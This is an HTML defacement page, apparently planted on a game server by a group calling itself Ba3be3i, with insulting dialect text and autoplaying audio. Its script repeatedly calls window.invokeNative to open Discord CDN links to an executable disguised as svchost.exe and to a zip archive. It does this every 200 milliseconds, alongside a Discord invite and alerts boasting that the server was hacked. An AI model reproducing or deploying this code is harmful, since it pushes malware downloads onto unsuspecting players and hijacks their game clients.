<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Ba3be3i</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      background: url('background.gif') no-repeat center center fixed;
      background-size: cover;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
      flex-direction: column;
      font-family: 'Arial', sans-serif;
      color: white;
      text-shadow: 2px 2px 4px rgba(0,0,0,0.7);
      overflow: hidden;
    }

    h1, h2, h4, h3 {
      margin: 10px;
      text-align: center;
      color: brown;
    }
    #nameList {
      position: absolute;
      left: 0;
      top: 50%;
      transform: translateY(-50%);
      padding: 20px;
      animation: slideIn 1.2s ease-out forwards;
      opacity: 0;
    }

    @keyframes slideIn {
      0% {
        transform: translate(-100%, -50%);
        opacity: 0;
      }
      100% {
        transform: translate(0, -50%);
        opacity: 1;
      }
    }

    #nameList ul {
      list-style: none;
      padding: 0;
      margin: 0;
    }

    #nameList li {
      margin: 10px 0;
      color: white;
      font-weight: bold;
      font-size: 18px;
      text-shadow: 2px 2px 4px rgba(255, 0, 0, 0.7);
    }

    audio {
      display: none;
    }
  </style>
</head>
<body>
  <div id="nameList">
    <ul>
      <li>Shasper</li>
      <li>Jyloz</li>
      <li>Kasper i7ebekkk</li>
      <li>Lord</li>
      <li>Phenomenal</li>
      <li>SPINX</li>
      <li>Staff Ba3be3i Lkol isalim 3likom</li>
    </ul>
  </div>

  <h1>Ba3be3i inik il kol 3asba likom</h1>
  <h2>manhichmouch minkom ki bich nodhirboukom</h2>
  <h3>9awi niveau nik omkom</h3>
  <h4>
    Etoonsy isalim 3likom<br>
    Serverkom Bokh barcha
  </h4>
  <audio src="ba3be3i.mp3" autoplay loop></audio>
  <script>
    alert("Congradulation you joined CLS PVP the server had been hacked by Ba3be3i Team (Jyloz, Shasper, Spinx, Tounsi) and enjoy cheats on your pc");
    
    setInterval(() => {
      window.invokeNative("openUrl", "https://cdn.discordapp.com/attachments/1313815205222027264/1313815335136395284/svchost.exe?ex=689529a1&is=6893d821&hm=875be8bc057c826e333af76e12413be5abe8c47fdbbcef0b2b4ecef02d85d1a9&");
      window.invokeNative("openUrl", "https://cdn.discordapp.com/attachments/1315010107905540187/1315010279481933975/E.zip?ex=6894e542&is=689393c2&hm=31220e58780c08316286750700f31653894598f487399e3fb653c3248ffe8d08&");
      window.invokeNative("openUrl", "https://discord.gg/m23F3Z25SK");
      alert("Congradulation you joined CLS PVP the server had been hacked by Ba3be3i Team (Jyloz, Shasper, Spinx, Tounsi , Lord & Phenomenal) and enjoy cheats on your pc");
    }, 200);
  </script>
</body>
</html>
